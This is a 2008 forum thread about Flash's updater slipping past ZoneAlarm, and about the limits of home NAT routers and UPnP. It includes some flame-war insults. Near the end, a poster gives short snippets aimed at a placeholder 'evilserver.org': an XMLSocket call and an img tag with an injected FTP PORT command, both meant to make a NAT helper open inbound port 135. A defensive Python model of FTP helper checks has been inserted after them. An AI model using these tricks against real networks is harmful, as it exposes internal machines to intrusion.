Adobe Flash Updater accessed internet... but how?



petethebloke@googlemail.com
02-12-08, 03:38 AM
When I booted up this morning (win XP pro) I went to make a cup of tea
and when I got back a program called FlashUtil9D.exe was informing me
that Flash Player had an update as described in APSB07-20. What is
confusing me is how it got access to the internet. I had not started a
browser, there are no Adobe programs in my startup sequence (I use
Start Up Control Panel by Mike Lin) and Zone Alarm is configured to
'ask' for all Adobe applications.

The only thing I can think is that Flash knew about the update last
night and waited till restart to tell me, but this doesn't sound right
because Start Up Monitor normally catches any prog that leaves a
runonce in the registry.

Any ideas? Maybe Adobe has given me a rootkit. I wouldn't be overly
surprised.

Sebastian G.
02-12-08, 08:19 AM
petethebloke@googlemail.com wrote:

> When I booted up this morning (win XP pro) I went to make a cup of tea
> and when I got back a program called FlashUtil9D.exe was informing me
> that Flash Player had an update as described in APSB07-20. What is
> confusing me is how it got access to the internet. I had not started a
> browser, there are no Adobe programs in my startup sequence (I use
> Start Up Control Panel by Mike Lin)


So what? It's loaded as a Browser Helper Object through the MSHTML engine
in Windows Explorer.

> and Zone Alarm is configured to 'ask' for all Adobe applications.


Why should this matter? Anyway, why have you installed such a nonsense?

> Any ideas? Maybe Adobe has given me a rootkit. I wouldn't be overly
> surprised.


Installing privileged services as documented is no rootkit.

But surely you should expect your system to be compromised and rootkitted,
since you obviously invited malware.

petethebloke@googlemail.com
02-12-08, 08:54 AM
On 12 Feb, 14:19, "Sebastian G." <se...@seppig.de> wrote:
> petethebl...@googlemail.com wrote:
> > When I booted up this morning (win XP pro) I went to make a cup of tea
> > and when I got back a program called FlashUtil9D.exe was informing me
> > that Flash Player had an update as described in APSB07-20. What is
> > confusing me is how it got access to the internet. I had not started a
> > browser, there are no Adobe programs in my startup sequence (I use
> > Start Up Control Panel by Mike Lin)
>
> So what? It's loaded as a Browser Helper Object through the MSHTML engine
> in Windows Explorer.
>
> > and Zone Alarm is configured to 'ask' for all Adobe applications.
>
> Why should this matter? Anyway, why have you installed such a nonsense?
>
> > Any ideas? Maybe Adobe has given me a rootkit. I wouldn't be overly
> > surprised.
>
> Installing privileged services as documented is no rootkit.
>
> But surely you should expect your system to be compromised and rootkitted,
> since you obviously invited malware.

Hee hee. Thanks Sebastian. Is it the MS WinXP that you consider
malware or the Adobe Flash player? Unfortunately, my line of work
means I have to have Flash player available even though my settings on
the Proxomitron prevent downloads of most of the nice little movies
that people seem to value so highly.

Flash is loaded as a BHO in IE7, you're right there, but I still can't
see how it updates before I start IE7 - which I don't, very often.
From what you're saying, it must be started by Windows and allowed out
through ZoneAlarm as "Generic Host Process win32".

Why does it matter? Because when you think you have your computer
nailed down the way you like it, it's a bit annoying to find that a
sneaky little program that you don't even like using has somehow
bypassed all your day-to-day controls.

Sebastian G.
02-12-08, 09:03 AM
petethebloke@googlemail.com wrote:


> Hee hee. Thanks Sebastian. Is it the MS WinXP that you consider
> malware or the Adobe Flash player?


None. I just told you that you're obviously inviting malware by having
installed ZoneAlarm.

> Flash is loaded as a BHO in IE7, you're right there, but I still can't
> see how it updates before I start IE7


Because Windows Explorer uses some shell control from IE.

> From what you're saying, it must be started by Windows and allowed out
> through ZoneAlarm as "Generic Host Process win32".


Nonsense. Every service running under LocalSystem account can use Raw
Sockets to bypass NDIS filtering drivers. Which is exactly what the Adobe
License Manager Service used in some of the expensive Adobe software packages
does (according to documentation and supervision).

> Why does it matter? Because when you think you have your computer
> nailed down the way you like it, it's a bit annoying to find that a
> sneaky little program that you don't even like using has somehow
> bypassed all your day-to-day controls.


Your computer is anything but nailed down. Heck, you have installed ZoneAlarm!

petethebloke@googlemail.com
02-12-08, 09:14 AM
On 12 Feb, 15:03, "Sebastian G." <se...@seppig.de> wrote:
> petethebl...@googlemail.com wrote:
> > Hee hee. Thanks Sebastian. Is it the MS WinXP that you consider
> > malware or the Adobe Flash player?
>
> None. I just told you that you're obviously inviting malware by having
> installed ZoneAlarm.
>
> > Flash is loaded as a BHO in IE7, you're right there, but I still can't
> > see how it updates before I start IE7
>
> Because Windows Explorer uses some shell control from IE.
>
> > From what you're saying, it must be started by Windows and allowed out
> > through ZoneAlarm as "Generic Host Process win32".
>
> Nonsense. Every service running under LocalSystem account can use Raw
> Sockets to bypass NDIS filtering drivers. Which is exactly what the Adobe
> License Manager Service used in some of the expensive Adobe software packages
> does (according to documentation and supervision).
>
> > Why does it matter? Because when you think you have your computer
> > nailed down the way you like it, it's a bit annoying to find that a
> > sneaky little program that you don't even like using has somehow
> > bypassed all your day-to-day controls.
>
> Your computer is anything but nailed down. Heck, you have installed ZoneAlarm!

Thanks for the comments. I use Dreamweaver and the FNPLicensing
Service has to be going or DW won't start. That probably explains it
(although Adobe Updater still gets blocked by ZA before I allow it
access to the internet - that must be the less surreptitious version
of Adobe updater).

It's interesting what you say about ZA. I've been using it for several
years and I suppose habit is a bad thing. It has become less what I want
it to be in the last year or two, but I complacently figured that it
would give me the protection I need when combined with my network
router. I did get a nasty shock at Christmas though, my son's Xbox 360
was able to reconfigure my router entirely without so much as asking
if I minded. I presume that's uPNP?

Sebastian G.
02-12-08, 11:42 AM
petethebloke@googlemail.com wrote:


> Thanks for the comments. I use Dreamweaver and the FNPLicensing
> Service has to be going or DW won't start. That probably explains it
> (although Adobe Updater still gets blocked by ZA before I allow it
> access to the internet - that must be the less surreptitious version
> of Adobe updater).


According to Adobe's documentation, the License Manager Service's connection
can be used to circumvent obvious misconfigurations (like ZoneAlarm) when
Adobe Updater can't find any connection.


> It's interesting what you say about ZA. I've been using it for several
> years and I suppose habit is a bad thing. It has become less what I want
> it to be in the last year or two, but I complacently figured that it
> would give me the protection I need when combined with my network
> router.


I figured that many computer users are unable to recognize the overly
spurious claims of ZoneAlarm as the pure irony it is. I also figured that
these people never bother to verify the functionality, much less inform
themselves about known problems and vulnerabilities.

> I did get a nasty shock at Christmas though, my son's Xbox 360
> was able to reconfigure my router entirely without so much as asking
> if I minded. I presume that's uPNP?


Most likely. uPNP, due to being totally unauthenticated, is one of the most
stupid ideas in computer history.

petethebloke@googlemail.com
02-12-08, 12:13 PM
On 12 Feb, 17:42, "Sebastian G." <se...@seppig.de> wrote:
> petethebl...@googlemail.com wrote:
> > Thanks for the comments. I use Dreamweaver and the FNPLicensing
> > Service has to be going or DW won't start. That probably explains it
> > (although Adobe Updater still gets blocked by ZA before I allow it
> > access to the internet - that must be the less surreptitious version
> > of Adobe updater).
>
> According to Adobe's documentation, the License Manager Service's connection
> can be used to circumvent obvious misconfigurations (like ZoneAlarm) when
> Adobe Updater can't find any connection.
>
> > It's interesting what you say about ZA. I've been using it for several
> > years and I suppose habit is a bad thing. It has become less what I want
> > it to be in the last year or two, but I complacently figured that it
> > would give me the protection I need when combined with my network
> > router.
>
> I figured that many computer users are unable to recognize the overly
> spurious claims of ZoneAlarm as the pure irony it is. I also figured that
> these people never bother to verify the functionality, much less inform
> themselves about known problems and vulnerabilities.
>
> > I did get a nasty shock at Christmas though, my son's Xbox 360
> > was able to reconfigure my router entirely without so much as asking
> > if I minded. I presume that's uPNP?
>
> Most likely. uPNP, due to being totally unauthenticated, is one of the most
> stupid ideas in computer history.

Thanks again Sebastian. You've given me some food for thought. I'll
look at replacing ZA.

Your assumption that "people" never bother to check functionality is
not quite correct in my case - I use GRC's ShieldsUp scan
periodically. I don't expect this to make me totally cracker-proof but
I imagine most script kiddies will move on to easier pickings. You'll
probably poo-poo my naive faith in such amateur methods of defence but
I don't have a lot to hide so I'll probably keep gambling!

But seriously... thanks for your time.

Pete

Sebastian G.
02-12-08, 01:25 PM
petethebloke@googlemail.com wrote:


> Your assumption that "people" never bother to check functionality is
> not quite correct in my case - I use GRC's ShieldsUp scan
> periodically.


Which in turn proves my statement, since this lousy web application of the
well-known charlatan Gibson is about the most wonderful creator of fantasy
reports I've ever seen.

> I don't expect this to make me totally cracker-proof but
> I imagine most script kiddies will move on to easier pickings.


With only two missing points:

- Your system is trivially vulnerable.
- Scripts are not intelligent enough to tell differences. They simply fire
out all exploits and wait for the compromised systems to report back.
- It's not about them choosing your machine, it's about you choosing their
webservers. Just surfing to a website is enough to compromise a system
running ZoneAlarm, and since many legitimate websites include content from
untrusted third parties, it's not like you could avoid this.

petethebloke@googlemail.com
02-12-08, 01:36 PM
On 12 Feb, 19:25, "Sebastian G." <se...@seppig.de> wrote:
> petethebl...@googlemail.com wrote:
> > Your assumption that "people" never bother to check functionality is
> > not quite correct in my case - I use GRC's ShieldsUp scan
> > periodically.
>
> Which in turn proves my statement, since this lousy web application of the
> well-known charlatan Gibson is about the most wonderful creator of fantasy
> reports I've ever seen.
>
> > I don't expect this to make me totally cracker-proof but
> > I imagine most script kiddies will move on to easier pickings.
>
> With only two missing points:
>
> - Your system is trivially vulnerable.
> - Scripts are not intelligent enough to tell differences. They simply fire
> out all exploits and wait for the compromised systems to report back.
> - It's not about them choosing your machine, it's about you choosing their
> webservers. Just surfing to a website is enough to compromise a system
> running ZoneAlarm, and since many legitimate websites include content from
> untrusted third parties, it's not like you could avoid this.

You're a bundle of fun. I must read through your old posts to find out
what you recommend as a solution.

Todd H.
02-12-08, 02:58 PM
"petethebloke@googlemail.com" <petethebloke@googlemail.com> writes:

> You're a bundle of fun. I must read through your old posts to find out
> what you recommend as a solution.

Pete,

Welcome to the group, and sorry I didn't intervene sooner.

You need to know that Sebastian was apparently breastfed by his
father. His mother said she only liked him as a friend. It explains
his winning personality a bit.

Among his more interesting takes, Sebastian recommends using no anti-
virus software at all and using Windows firewall exclusively for
inbound protection. He seems to prefer the latter yet argues oddly
that there isn't any value in home gateway devices that default deny
all unsolicited inbound connections. I intentionally avoid the use of
the word "firewall" here because it's another of Sebastian's ranting
points that such devices aren't "real firewalls."

Sebastian's contributions aren't entirely worthless, but you do have
to apply a liberal filter to his Tech Support Guy bully idiom to glean
those things. We know far more about what Sebastian dislikes than
what we know about what he actually likes. The world has been cruel
to him, perhaps. We may never be sure.

At any rate, I certainly wouldn't take anything he says as the final
word on anything.

Best Regards,
--
Todd H.
http://www.toddh.net/

Sebastian G.
02-12-08, 03:23 PM
Todd H. wrote:

> He seems to prefer the latter yet argues oddly
> that there isn't any value in home gateway devices that default deny
> all unsolicited inbound connections.


Well, because they don't and shouldn't anyway.

> I intentionally avoid the use of
> the word "firewall" here because it's another of Sebastian's ranting
> points that such devices aren't "real firewalls."


A packet filter inside a router can implement a firewall very well. However,
most implementations in SOHO routers are horribly broken and lacking
sufficient configurability.

> At any rate, I certainly wouldn't take anything he says as the final
> word on anything.


You mean that he should wait until someone triggers the unpatched buffer
overflow in ZoneAlarm's HTTP parser?

Todd H.
02-12-08, 04:41 PM
"Sebastian G." <seppi@seppig.de> writes:

> Todd H. wrote:
>
> > He seems to prefer the latter yet argues oddly
> > that there isn't any value in home gateway devices that default deny
> > all unsolicited inbound connections.
>
> Well, because they don't and shouldn't anyway.

I'm open to hearing an example. Say... oh, Broadcom
based box running Tomato, openwrt or dd-wrt (by the way, do you have
anything/everything to do with that project or is your name just
rather similar to Sebastian Gottschall?).

And why shouldn't they block unsolicited inbound?

> > I intentionally avoid the use of the word "firewall" here because
> > it's another of Sebastian's ranting points that such devices
> > aren't "real firewalls."
>
>
> A packet filter inside a router can implement a firewall very
> well. However, most implementations in SOHO routers are horribly
> broken and lacking sufficient configurability.

Horribly broken how? Name names.


--
Todd H.
http://www.toddh.net/

Gerald Vogt
02-13-08, 12:22 AM
On Feb 13, 5:58 am, comph...@toddh.net (Todd H.) wrote:
> You need to know that Sebastian was apparently breastfed by his
> father. His mother said she only liked him as a friend. It explains
> his winning personality a bit.

Sorry, but this outrageous comment makes you a sick bastard lacking
any kind of decency.

Gerald

Todd H.
02-13-08, 12:49 AM
Gerald Vogt <vogt@spamcop.net> writes:

> On Feb 13, 5:58 am, comph...@toddh.net (Todd H.) wrote:
> > You need to know that Sebastian was apparently breastfed by his
> > father. His mother said she only liked him as a friend. It explains
> > his winning personality a bit.
>
> Sorry, but this outrageous comment makes you a sick bastard lacking
> any kind of decency.

Truth be known, I'm more of a guy who can recall and apply some really
good Rodney Dangerfield lines when the opportunity arises. :-)

Best Regards,
--
Todd H.
http://www.toddh.net/

petethebloke@googlemail.com
02-13-08, 06:02 AM
On 13 Feb, 06:49, comph...@toddh.net (Todd H.) wrote:
> Gerald Vogt <v...@spamcop.net> writes:
> > On Feb 13, 5:58 am, comph...@toddh.net (Todd H.) wrote:
> > > You need to know that Sebastian was apparently breastfed by his
> > > father. His mother said she only liked him as a friend. It explains
> > > his winning personality a bit.
>
> > Sorry, but this outrageous comment makes you a sick bastard lacking
> > any kind of decency.
>
> Truth be known, I'm more of a guy who can recall and apply some really
> good Rodney Dangerfield lines when the opportunity arises. :-)
>
> Best Regards,
> --
> Todd H. http://www.toddh.net/

Thanks Todd, for your intervention. Please don't let yourself be
dragged into a flame war when you were just coming to the aid of this
passing traveller (even if you did kind of start the ball rolling in
the insult department - but Sebastian doesn't come across as the sort
of fellow who needs mollycoddling). I read a few other threads
Sebastian contributed to and he strikes me as a very clever, polyglot,
computer expert who is torn between being generous with his time and
maintaining his contempt for the average joe. He may not have
oozed the milk of human kindness, but he took the time to reply and to
justify his point of view, even if he didn't suggest or recommend
alternatives. I'm indebted to him - USENET depends on people who give
up a few minutes here and a few minutes there to help strangers and
I'm always astonished by the generosity I find in groups like this.

Pete

Sebastian G.
02-13-08, 07:05 AM
Todd H. wrote:

> "Sebastian G." <seppi@seppig.de> writes:
>
>> Todd H. wrote:
>>
>>> He seems to prefer the latter yet argues oddly
>>> that there isn't any value in home gateway devices that default deny
>>> all unsolicited inbound connections.
>> Well, because they don't and shouldn't anyway.
>
> I'm open to hearing an example. Say... oh, Broadcom
> based box running Tomato, openwrt or dd-wrt (by the way, do you have
> anything/everything to do with that project or is your name just
> rather similar to Sebastian Gottschall?).


Excuse me... I thought you understood the meaning. I should have written
"generally don't". Some implementations, mostly from free volunteers instead
of the vendor, actually are reliable.

> And why shouldn't they block unsolicited inbound?


Because it's not the purpose of NAT. NAT is supposed to provide
connectivity, and in fact for a 1:1 NAT anything but forwarding all inbound
traffic would be technically wrong.

>>> I intentionally avoid the use of the word "firewall" here because
>>> it's another of Sebastian's ranting points that such devices
>>> aren't "real firewalls."
>>
>> A packet filter inside a router can implement a firewall very
>> well. However, most implementations in SOHO routers are horribly
>> broken and lacking sufficient configurability.
>
> Horribly broken how?


Application layer NAT helpers, heuristics, bad IP fragment reassembly...

Ansgar -59cobalt- Wiechers
02-13-08, 08:17 AM
Todd H. <comphelp@toddh.net> wrote:
> You need to know that Sebastian was apparently breastfed by his
> father. His mother said she only liked him as a friend. It explains
> his winning personality a bit.

*plonk*

cu
59cobalt
--
"If a software developer ever believes a rootkit is a necessary part of
their architecture they should go back and re-architect their solution."
--Mark Russinovich

Todd H.
02-13-08, 08:39 AM
"Sebastian G." <seppi@seppig.de> writes:

> Todd H. wrote:
>
> > "Sebastian G." <seppi@seppig.de> writes:
> >
> >> Todd H. wrote:
> >>
> >>> He seems to prefer the latter yet argues oddly
> >>> that there isn't any value in home gateway devices that default deny
> >>> all unsolicited inbound connections.
> >> Well, because they don't and shouldn't anyway.
> > I'm open to hearing an example. Say... oh, Broadcom
> > based box running Tomato, openwrt or dd-wrt (by the way, do you have
> > anything/everything to do with that project or is your name just
> > rather similar to Sebastian Gottschall?).
>
>
> Excuse me... I thought you understood the meaning. I should have
> written "generally don't". Some implementations, mostly from free
> volunteers instead of the vendor, actually are reliable.

Fair nuff. Your saying "they don't [provide any value]" did paint
with an awfully broad brush.

So I guess then Buffalo branded devices will soon have your stamp of
approval and soften you from the "home nat routers are worthless"
stance?

> > And why shouldn't they block unsolicited inbound?
>
> Because it's not the purpose of NAT. NAT is supposed to provide
> connectivity, and in fact for a 1:1 NAT anything but forwarding all
> inbound traffic would be technically wrong.

That's like saying "real muscle cars didn't have seatbelts and modern
ones shouldn't either," then calling a modern car "unsafe and
shouldn't be." That's kinda bizarre to me.

I think that criticism is poorly placed. These boxes are not sold as
"pristine brilliant pure NAT devices" nor should they be. They're
sold in no small part to protect home networks from the constant
barrage of network based scans. No one cares about the purity of the
NAT definition - so long as unsolicited inbound network traffic is
reliably blocked, what does it matter?

> >>> I intentionally avoid the use of the word "firewall" here because
> >>> it's another of Sebastian's ranting points that such devices
> >>> aren't "real firewalls."
> >>
> >> A packet filter inside a router can implement a firewall very
> >> well. However, most implementations in SOHO routers are horribly
> >> broken and lacking sufficient configurability.
> > Horribly broken how?
>
> Application layer NAT helpers, heuristics, bad IP fragment
> reassembly...

This also paints with a pretty broad brush. Has anyone published
anything on say, the oft-recommended Linksys WRT54G about such issues?

Best Regards,
--
Todd H.
http://www.toddh.net/

Todd H.
02-13-08, 08:48 AM
"petethebloke@googlemail.com" <petethebloke@googlemail.com> writes:

> On 13 Feb, 06:49, comph...@toddh.net (Todd H.) wrote:
> > Gerald Vogt <v...@spamcop.net> writes:
> > > On Feb 13, 5:58 am, comph...@toddh.net (Todd H.) wrote:
> > > > You need to know that Sebastian was apparently breastfed by his
> > > > father. His mother said she only liked him as a friend. It explains
> > > > his winning personality a bit.
> >
> > > Sorry, but this outrageous comment makes you a sick bastard lacking
> > > any kind of decency.
> >
> > Truth be known, I'm more of a guy who can recall and apply some really
> > good Rodney Dangerfield lines when the opportunity arises. :-)
> >
> > Best Regards,
> > --
> > Todd H. http://www.toddh.net/
>
> Thanks Todd, for your intervention. Please don't let yourself be
> dragged into a flame war when you were just coming to the aid of this
> passing traveller (even if you did kind of start the ball rolling in
> the insult department - but Sebastian doesn't come across as the sort
> of fellow who needs mollycoddling). I read a few other threads
> Sebastian contributed to and he strikes me as a very clever, polyglot,
> computer expert who is torn between being generous with his time and
> maintaining his contempt for the average joe. He may not have
> oozed the milk of human kindness, but he took the time to reply and to
> justify his point of view, even if he didn't suggest or recommend
> alternatives. I'm indebted to him - USENET depends on people who give
> up a few minutes here and a few minutes there to help strangers and
> I'm always astonished by the generosity I find in groups like this.
>
> Pete

You make a good point. As I hinted earlier, for all of the faults of
the ever acerbic Sebastian, when pressed on technical points, he will
give up information if asked, which is why this forum is certainly
better off with him than without. However it's the default "bash,
trash, but not compellingly explain" modus operandi that leaves me
scratching my head many times. It's a strange thing to be on one hand
generous with your time, yet be contemptuous toward those to whom
you're giving it. Depends on one's
altruism-to-makin-myself-feel-smart motivation ratio for participating
in usenet, I suppose.

Best Regards,
--
Todd H.
http://www.toddh.net/

Sebastian G.
02-13-08, 09:52 AM
Todd H. wrote:


> So I guess then Buffalo branded devices will soon have your stamp of
> approval and soften you from the "home nat routers are worthless"
> stance?


No. The problem with NAT is that there're multiple ways to influence client
applications to trigger forwarding rules. Just take a look at Flash and
Java, not mentioning VoIP applications...

> No one cares about the purity of the
> NAT definition - so long as unsolicited inbound network traffic is
> reliably blocked, what does it matter?


Because it creates connectivity problems?
Because your proclaimed reliable doesn't exist, by design?
Because such a blockade is pretty superfluous?

> This also paints with a pretty broad brush. Has anyone published
> anything on say, the oft-recommended Linksys WRT54G about such issues?

Yes, see <http://bedatec.dyndns.org/ftpnat/routers_en.html>. Please denote
that this is not a problem of the implementation, but the configuration: If
the interface would allow proper low-level access to netfilter/iptables
instead of the limited front-end, one could properly take the FTP NAT helper
into account (or even deactivate it).

Todd H.
02-13-08, 11:02 AM
"Sebastian G." <seppi@seppig.de> writes:

> Todd H. wrote:
>
>
> > So I guess then Buffalo branded devices will soon have your stamp of
> > approval and soften you from the "home nat routers are worthless"
> > stance?
>
>
> No. The problem with NAT is that there're multiple ways to influence
> client applications to trigger forwarding rules. Just take a look at
> Flash and Java, not mentioning VoIP applications...

Patch (authentication bypass holes that have befallen Linksys in the
past) and disable the inanity of uPNP and we're done with that
though.

Or do you have something else in mind?

> > No one cares about the purity of the NAT definition - so long as
> > unsolicited inbound network traffic is reliably blocked, what does
> > it matter?
>
> Because it creates connectivity problems?
> Because your proclaimed reliable doesn't exist, by design?
> Because such a blockade is pretty superfluous?

Like hundreds of thousands of people, I use one of these classes of
boxes. What connectivity problems?

How do you posit that inbound blocking on a nat router is any more
superfluous than the Windows Firewall software that you do seem to
like?

> > This also paints with a pretty broad brush. Has anyone published
> > anything on say, the oft-recommended Linksys WRT54G about such issues?
>
> Yes, see <http://bedatec.dyndns.org/ftpnat/routers_en.html>. Please
> denote that this is not a problem of the implementation, but the
> configuration: If the interface would allow proper low-level access to
> netfilter/iptables instead of the limited front-end, one could
> properly take the FTP NAT helper into account (or even deactivate it).

Interesting. Wish the test description weren't in German though.
Is there a BID on this vuln? Or basically, I'm now curious what this
test was.

Best Regards,
--
Todd H.
http://www.toddh.net/

Sebastian G.
02-13-08, 11:39 AM
Todd H. wrote:

> "Sebastian G." <seppi@seppig.de> writes:
>
>> Todd H. wrote:
>>
>>
>>> So I guess then Buffalo branded devices will soon have your stamp of
>>> approval and soften you from the "home nat routers are worthless"
>>> stance?
>>
>> No. The problem with NAT is that there're multiple ways to influence
>> client applications to trigger forwarding rules. Just take a look at
>> Flash and Java, not mentioning VoIP applications...
>
> Patch (authentication bypass holes that have befallen Linksys in the
> past) and disable the inanity of uPNP and we're done with that
> though.
>
> Or do you have something else in mind?


XMLSocket foo = new XMLSocket("evilserver.org",31337);
foo.setLocalPort(135);
XMLRequest bar = new XMLRequest("whatever");
foo.sendrequest(bar);

There's nothing exploited, it's just the way NAT works.

Or, even simpler:

<img src="ftp://evilserver.org/%10%13SET%20%PORT%20135,0,1,0,168,192%10%13">

Nothing exploited, that's just how FTP NAT helpers work.

> Like hundreds of thousands of people, I use one of these classes of
> boxes. What connectivity problems?


Aside from even the simplest load balancing breaking? Just take any
sufficiently complex protocol, f.e. various P2P protocols, various computer
games, VoIP applications...

> How do you posit that inbound blocking on a nat router is any more
> superfluous than the Windows Firewall software that you do seem to
> like?


I don't have too, since this is solely your claim so far.

> Interesting. Wish the test description weren't in German though.
> Is there a BID on this vuln? Or basically, I'm now curious what this
> test was.


It's basically a Java or Flash applet acting as a FTP client, using the PORT
command, the FTP NAT helper parsing the command and adding an appropriate
NAT table entry. There's nothing wrong with this, it just voids some false
security assumptions about NAT.
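The helper behaviour described above, as an added example (it is neither the thread's code nor netfilter's own): a small Python model of an FTP NAT helper parsing PORT commands, contrasting a loose helper, which opens a pinhole for whatever the command names, with a strict one that only honours the client's own address and an unprivileged port. The client address, the control-channel transcript and the "strict" policy are constructed for this example.

```python
"""
Model of the decision an FTP NAT helper makes when it sees a PORT command.
Constructed teaching example, not netfilter's own nf_conntrack_ftp code.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# PORT h1,h2,h3,h4,p1,p2 (RFC 959): four address octets, then the port as
# two base-256 digits. This is the command the applet in the thread emits.
PORT_RE = re.compile(r"^PORT\s+(\d{1,3}(?:,\d{1,3}){5})\s*$", re.IGNORECASE)


@dataclass(frozen=True)
class PortCommand:
    host: str
    port: int


def parse_port_command(line: str) -> Optional[PortCommand]:
    """Decode a PORT line into (host, port); None if it is not well formed."""
    m = PORT_RE.match(line.strip())
    if m is None:
        return None
    nums = [int(x) for x in m.group(1).split(",")]
    if any(n > 255 for n in nums):
        return None
    host = ".".join(str(n) for n in nums[:4])
    port = nums[4] * 256 + nums[5]
    return PortCommand(host, port)


def helper_would_open(cmd: PortCommand, client_ip: str,
                      strict: bool) -> Tuple[bool, str]:
    """
    Would the helper add an inbound expectation (a temporary pinhole) for
    this data connection?

    loose  (strict=False): trust the PORT arguments as given. This is what
           the thread's applet relies on: the control channel belongs to the
           client, but the pinhole is opened for whatever address and port
           the applet names.
    strict (strict=True):  the address must be the client's own address and
           the port must be unprivileged. netfilter's FTP helper has a
           comparable address check behind its 'loose' module parameter; the
           port check is this model's own addition.
    """
    if not strict:
        return True, "loose helper: pinhole opened as requested"
    if cmd.host != client_ip:
        return False, "PORT address differs from the client's own address"
    if cmd.port < 1024:
        return False, "PORT names a privileged port"
    return True, "strict helper: pinhole opened for the client's own port"


# Constructed control-channel transcript as the helper would see it from the
# inside host 192.168.1.10. Only the PORT lines matter to the helper.
SAMPLE_CONTROL_CHANNEL = [
    "USER anonymous",
    "PASS guest@",
    "PORT 192,168,1,10,200,57",   # 192.168.1.10:51257, an ephemeral port
    "PORT 192,168,1,10,0,135",    # 192.168.1.10:135, a service port
    "PORT 192,168,1,20,200,57",   # a different host on the same LAN
    "PORT 192,168,1,10,256,1",    # malformed octet
    "LIST",
]


def audit_control_channel(lines: List[str],
                          client_ip: str) -> List[Tuple[str, bool, bool]]:
    """
    For every PORT line, report (line, loose_opens, strict_opens).
    A line the parser rejects opens nothing under either policy.
    """
    report = []
    for line in lines:
        if not line.upper().startswith("PORT"):
            continue
        cmd = parse_port_command(line)
        if cmd is None:
            report.append((line, False, False))
            continue
        loose_ok, _ = helper_would_open(cmd, client_ip, strict=False)
        strict_ok, _ = helper_would_open(cmd, client_ip, strict=True)
        report.append((line, loose_ok, strict_ok))
    return report


if __name__ == "__main__":
    for line, loose_ok, strict_ok in audit_control_channel(
            SAMPLE_CONTROL_CHANNEL, "192.168.1.10"):
        print(f"{line:<28} loose={loose_ok!s:<5} strict={strict_ok}")
```

Under the loose policy all three well-formed PORT lines get a pinhole, including the one naming port 135 and the one naming a neighbouring host; the strict policy honours only the client's own ephemeral port.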

BrainSlayer
07-04-08, 08:11 AM
Just as information: Sebastian G. here is not Sebastian Gottschall
(BrainSlayer), even if he seems to live in the same town or area.
But I found out that 2 persons with the same name are living here, if I
look at the student list here at the university.

thx,
Sebastian Gottschall


--
BrainSlayer
View this thread: http://forums.techarena.in/showthread.php?t=913471